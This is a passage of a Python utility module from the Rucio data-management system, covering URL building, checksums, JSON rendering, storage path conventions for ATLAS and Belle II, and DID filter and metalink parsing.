# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def build_url(url, path=None, params=None, doseq=False):
"""
utitily function to build an url for requests to the rucio system.
If the optional parameter doseq is evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
if path is not None:
complete_url += "/" + path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
"""
Checks if both of the following statements are true:
- all items in required_scope are present in scope string
- all items in required_audience are present in audience
returns false otherwise. audience and scope must be both strings
or both lists. Similarly for required_* variables.
If this condition is satisfied, False is returned.
:params scope: list of strings or one string where items are separated by a separator input variable
:params audience: list of strings or one string where items are separated by a separator input variable
:params required_scope: list of strings or one string where items are separated by a separator input variable
:params required_audience: list of strings or one string where items are separated by a separator input variable
:params sepatator: separator string, space by default
:returns : True or False
"""
if not scope:
scope = ""
if not audience:
audience = ""
if not required_scope:
required_scope = ""
if not required_audience:
required_audience = ""
if (isinstance(scope, list) and isinstance(audience, list) and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope for elem in required_scope)
req_audience_present = all(elem in audience for elem in required_audience)
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) # NOQA: W504
and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = str(scope)
audience = str(audience)
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, list) and isinstance(audience, list) # NOQA: W504
and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) # NOQA: W504
and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = str(scope)
audience = str(audience)
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
return req_scope_present and req_audience_present
else:
return False
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'
def is_checksum_valid(checksum_name):
"""
A simple function to check wether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
return checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS
def set_preferred_checksum(checksum_name):
"""
A simple function to check wether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
if is_checksum_valid(checksum_name):
global PREFERRED_CHECKSUM
PREFERRED_CHECKSUM = checksum_name
def set_checksum_value(file, checksum_names_list):
for checksum_name in checksum_names_list:
if checksum_name in file['metadata'].keys() and file['metadata'][checksum_name]:
file['checksum'] = '%s:%s' % (checksum_name.upper(), str(file['metadata'][checksum_name]))
if checksum_name == PREFERRED_CHECKSUM:
break
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the stream plus one, and B is the sum of the individual values of A from each step.
:param file: file name
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
try:
with open(file, 'r+b') as f:
# memory map the file
m = mmap.mmap(f.fileno(), 0)
# partial block reads at slightly increased buffer sizes
for block in iter(partial(m.read, io.DEFAULT_BUFFER_SIZE), b''):
adler = zlib.adler32(block, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler32 checksum of file %s - %s' % (file, e))
# backflip on 32bit -- can be removed once everything is fully migrated to 64bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
CHECKSUM_ALGO_DICT['adler32'] = adler32
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
"""
Runs the SHA256 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
with open(file, "rb") as f:
bytes_ = f.read() # read entire file as bytes
readable_hash = hashlib.sha256(bytes_).hexdigest()
print(readable_hash)
return readable_hash
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
"""
Runs the CRC32 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
prev = 0
for eachLine in open(file, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def val_to_space_sep_str(vallist):
""" Converts a list of values into a string of space separated values
:param vallist: the list of values to to convert into string
:return: the string of space separated values or the value initially passed as parameter
"""
try:
if isinstance(vallist, list):
return text_type(" ".join(vallist))
else:
return text_type(vallist)
except:
return text_type('')
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only supported date-like format
# supported at dmain schema level is 'datetime' .
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, Enum):
return obj.name
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(list_):
""" JSON render function for list
"""
return json.dumps(list_, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
if hasattr(data, 'decode'):
data = data.decode('utf-8')
return json.loads(data, object_hook=datetime_parser)
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out.decode(encoding='utf-8'), err.decode(encoding='utf-8')
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(list_, n):
"""
Yield successive n-sized chunks from l.
"""
for i in range(0, len(list_), n):
yield list_[i:i + n]
def dict_chunks(dict_, n):
"""
Iterate over the dictionary in groups of the requested size
"""
it = iter(dict_)
for _ in range(0, len(dict_), n):
yield {k: dict_[k] for k in itertools.islice(it, n)}
def my_key_generator(namespace, fn, **kw):
"""
Customyzed key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], 'other', dsn, filename)
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'
_loaded_policy_modules = False
def register_surl_algorithm(surl_callable, name=None):
if name is None:
name = surl_callable.__name__
_SURL_ALGORITHMS[name] = surl_callable
register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def _register_policy_package_surl_algorithms():
def try_importing_policy(vo=None):
import importlib
try:
package = config.config_get('policy', 'package' + ('' if not vo else '-' + vo['vo']))
module = importlib.import_module(package)
if hasattr(module, 'get_surl_algorithms'):
_SURL_ALGORITHMS.update(module.get_surl_algorithms())
except (NoOptionError, NoSectionError, ImportError):
pass
from rucio.common import config
from rucio.core.vo import list_vos
try:
multivo = config.config_get_bool('common', 'multi_vo')
except (NoOptionError, NoSectionError):
multivo = False
if not multivo:
# single policy package
try_importing_policy()
else:
# policy package per VO
vos = list_vos()
for vo in vos:
try_importing_policy(vo)
def construct_surl(dsn, filename, naming_convention=None):
global _loaded_policy_modules
if not _loaded_policy_modules:
# on first call, register any SURL functions from the policy packages
_register_policy_package_surl_algorithms()
_loaded_policy_modules = True
if naming_convention is None or naming_convention not in _SURL_ALGORITHMS:
naming_convention = _DEFAULT_SURL
return _SURL_ALGORITHMS[naming_convention](dsn, filename)
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub(r'/srm/managerv1\?SFN=', '', surl)
surl = re.sub(r'/srm/v2/server\?SFN=', '', surl)
surl = re.sub(r'/srm/managerv2\?SFN=', '', surl)
if surl.startswith('https://storage.googleapis.com'):
surl = surl.split('?GoogleAccessId')[0]
if '?X-Amz' in surl:
surl = surl.split('?X-Amz')[0]
res.append(surl)
res.sort()
return res
_EXTRACT_SCOPE_ALGORITHMS = {}
_DEFAULT_EXTRACT = 'atlas'
def extract_scope_atlas(did, scopes):
# Try to extract the scope from the DSN
if did.find(':') > -1:
if len(did.split(':')) > 2:
raise RucioException('Too many colons. Cannot extract scope and name')
scope, name = did.split(':')[0], did.split(':')[1]
if name.endswith('/'):
name = name[:-1]
return scope, name
else:
scope = did.split('.')[0]
if did.startswith('user') or did.startswith('group'):
scope = ".".join(did.split('.')[0:2])
if did.endswith('/'):
did = did[:-1]
return scope, did
def extract_scope_belleii(did, scopes):
split_did = did.split('/')
if did.startswith('/belle/MC/'):
if did.startswith('/belle/MC/BG') or \
did.startswith('/belle/MC/build') or \
did.startswith('/belle/MC/generic') or \
did.startswith('/belle/MC/log') or \
did.startswith('/belle/MC/mcprod') or \
did.startswith('/belle/MC/prerelease') or \
did.startswith('/belle/MC/release'):
return 'mc', did
if did.startswith('/belle/MC/cert') or \
did.startswith('/belle/MC/dirac') or \
did.startswith('/belle/MC/dr3') or \
did.startswith('/belle/MC/fab') or \
did.startswith('/belle/MC/hideki') or \
did.startswith('/belle/MC/merge') or \
did.startswith('/belle/MC/migration') or \
did.startswith('/belle/MC/skim') or \
did.startswith('/belle/MC/test'):
return 'mc_tmp', did
if len(split_did) > 4:
if split_did[3].find('fab') > -1 or split_did[3].find('merge') > -1 or split_did[3].find('skim') > -1:
return 'mc_tmp', did
if split_did[3].find('release') > -1:
return 'mc', did
return 'mc_tmp', did
if did.startswith('/belle/Raw/'):
return 'raw', did
if did.startswith('/belle/hRaw'):
return 'hraw', did
if did.startswith('/belle/user/'):
if len(split_did) > 4:
if len(split_did[3]) == 1 and 'user.%s' % (split_did[4]) in scopes:
return 'user.%s' % split_did[4], did
if len(split_did) > 3:
if 'user.%s' % (split_did[3]) in scopes:
return 'user.%s' % split_did[3], did
return 'user', did
if did.startswith('/belle/group/'):
if len(split_did) > 4:
if 'group.%s' % (split_did[4]) in scopes:
return 'group.%s' % split_did[4], did
return 'group', did
if did.startswith('/belle/data/') or did.startswith('/belle/Data/'):
if len(split_did) > 4:
if split_did[3] in ['fab', 'skim']: # /belle/Data/fab --> data_tmp
return 'data_tmp', did
if split_did[3].find('release') > -1: # /belle/Data/release --> data
return 'data', did
if len(split_did) > 5:
if split_did[3] in ['proc']: # /belle/Data/proc
if split_did[4].find('release') > -1: # /belle/Data/proc/release*
if len(split_did) > 7 and split_did[6] in ['GCR2c', 'prod00000007', 'prod6b', 'proc7b',
'proc8b', 'Bucket4', 'Bucket6test', 'bucket6',
'proc9', 'bucket7', 'SKIMDATAx1', 'proc10Valid',
'proc10', 'SkimP10x1', 'SkimP11x1', 'SkimB9x1',
'SkimB10x1', 'SkimB11x1']: # /belle/Data/proc/release*/*/proc10/* --> data_tmp (Old convention)
return 'data_tmp', did
else: # /belle/Data/proc/release*/*/proc11/* --> data (New convention)
return 'data', did
if split_did[4].find('fab') > -1: # /belle/Data/proc/fab* --> data_tmp
return 'data_tmp', did
return 'data_tmp', did
if did.startswith('/belle/ddm/functional_tests/') or did.startswith('/belle/ddm/tests/') or did.startswith('/belle/test/ddm_test'):
return 'test', did
if did.startswith('/belle/BG/'):
return 'data', did
if did.startswith('/belle/collection'):
return 'collection', did
return 'other', did
def register_extract_scope_algorithm(extract_callable, name=[]):
if name is None:
name = extract_callable.__name__
_EXTRACT_SCOPE_ALGORITHMS[name] = extract_callable
register_extract_scope_algorithm(extract_scope_atlas, 'atlas')
register_extract_scope_algorithm(extract_scope_belleii, 'belleii')
def extract_scope(did, scopes=None, default_extract=_DEFAULT_EXTRACT):
extract_scope_convention = config_get('common', 'extract_scope', False, None)
if extract_scope_convention is None or extract_scope_convention not in _EXTRACT_SCOPE_ALGORITHMS:
extract_scope_convention = default_extract
return _EXTRACT_SCOPE_ALGORITHMS[extract_scope_convention](did=did, scopes=scopes)
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def sizefmt(num, human=True):
"""
Print human readable file sizes
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio searches a standard list of temporary directories. The list is:
The directory named by the TMP environment variable.
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
base_dir = os.path.abspath(tempfile.gettempdir())
try:
return os.path.join(base_dir, getpass.getuser())
except Exception:
pass
try:
return os.path.join(base_dir, str(os.getuid()))
except Exception:
pass
return base_dir
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Normally client IP will be set on the server side (request.remote_addr)
Here setting ip on the one seen by the host itself. There is no connection
to Google DNS servers.
Try to determine the sitename automatically from common environment variables,
in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
use the fixed string 'ROAMING'.
If environment variables sets location, it uses it.
"""
ip = None
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
ip = '0.0.0.0'
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
latitude = os.environ.get('RUCIO_LATITUDE')
longitude = os.environ.get('RUCIO_LONGITUDE')
if latitude and longitude:
try:
latitude = float(latitude)
longitude = float(longitude)
except ValueError:
latitude = longitude = 0
print('Client set latitude and longitude are not valid.')
else:
latitude = longitude = None
return {'ip': ip,
'fqdn': socket.getfqdn(),
'site': site,
'latitude': latitude,
'longitude': longitude}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if PY3 and isinstance(message, str):
message = message.encode()
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
base64_encoded = base64.b64encode(signature_stream.get_remainder())
if PY3:
base64_encoded = base64_encoded.decode()
return base64_encoded
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
if 'filename' not in lfn_dict:
return lfn_dict
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be send
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse(url))
mod_query = dict(parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlunparse(url_parts)
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
:param input_string: String containing a value and an unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type_ = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'created_after' or key == 'created_before':
value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type_ = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
raise ValueError('Length has to be an integer value.')
filters[key] = value
elif isinstance(value, string_types):
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
else:
filters[key] = value
return filters, type_
def parse_did_filter_from_string_fe(input_string, name='*', type='collection', omit_name=False):
"""
Parse DID filter string for the filter engine (fe).
Should adhere to the following conventions:
- ';' represents the logical OR operator
- ',' represents the logical AND operator
- all operators belong to set of (<=, >=, ==, !=, >, <, =)
- there should be no duplicate key+operator criteria.
One sided and compound inequalities are supported.
Sanity checking of input is left to the filter engine.
:param input_string: String containing the filter options.
:param name: DID name.
:param type: The type of the did: all(container, dataset, file), collection(dataset or container), dataset, container.
:param omit_name: omit addition of name to filters.
:return: list of dictionaries with each dictionary as a separate OR expression.
"""
# lookup table unifying all comprehended operators to a nominal suffix.
# note that the order matters as the regex engine is eager, e.g. don't want to evaluate '<=' as '<' and '='.
operators_suffix_LUT = OrderedDict({
'<=': 'lte',
'>=': 'gte',
'==': '',
'!=': 'ne',
'>': 'gt',
'<': 'lt',
'=': ''
})
# lookup table mapping operator opposites, used to reverse compound inequalities.
operator_opposites_LUT = {
'lt': 'gt',
'lte': 'gte'
}
operator_opposites_LUT.update({op2: op1 for op1, op2 in operator_opposites_LUT.items()})
filters = []
if input_string:
or_groups = list(filter(None, input_string.split(';'))) # split <input_string> into OR clauses
for or_group in or_groups:
or_group = or_group.strip()
and_groups = list(filter(None, or_group.split(','))) # split <or_group> into AND clauses
and_group_filters = {}
for and_group in and_groups:
and_group = and_group.strip()
# tokenise this AND clause using operators as delimiters.
tokenisation_regex = "({})".format('|'.join(operators_suffix_LUT.keys()))
and_group_split_by_operator = list(filter(None, re.split(tokenisation_regex, and_group)))
if len(and_group_split_by_operator) == 3: # this is a one-sided inequality or expression
key, operator, value = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator_mapped = operators_suffix_LUT.get(operator)
filter_key_full = key
if operator_mapped is not None:
if operator_mapped:
filter_key_full = "{}.{}".format(key, operator_mapped)
else:
raise DIDFilterSyntaxError("{} operator not understood.".format(operator_mapped))
if filter_key_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key_full)
else:
and_group_filters[filter_key_full] = value
elif len(and_group_split_by_operator) == 5: # this is a compound inequality
value1, operator1, key, operator2, value2 = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator1_mapped = operator_opposites_LUT.get(operators_suffix_LUT.get(operator1))
operator2_mapped = operators_suffix_LUT.get(operator2)
filter_key1_full = filter_key2_full = key
if operator1_mapped is not None and operator2_mapped is not None:
if operator1_mapped: # ignore '' operator (maps from equals)
filter_key1_full = "{}.{}".format(key, operator1_mapped)
if operator2_mapped: # ignore '' operator (maps from equals)
filter_key2_full = "{}.{}".format(key, operator2_mapped)
else:
raise DIDFilterSyntaxError("{} operator not understood.".format(operator_mapped))
if filter_key1_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key1_full)
else:
and_group_filters[filter_key1_full] = value1
if filter_key2_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key2_full)
else:
and_group_filters[filter_key2_full] = value2
else:
raise DIDFilterSyntaxError(and_group)
# add name key to each AND clause if it hasn't already been populated from the filter and <omit_name> not set.
if not omit_name and 'name' not in and_group_filters:
and_group_filters['name'] = name
filters.append(and_group_filters)
else:
if not omit_name:
filters.append({
'name': name
})
return filters, type
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
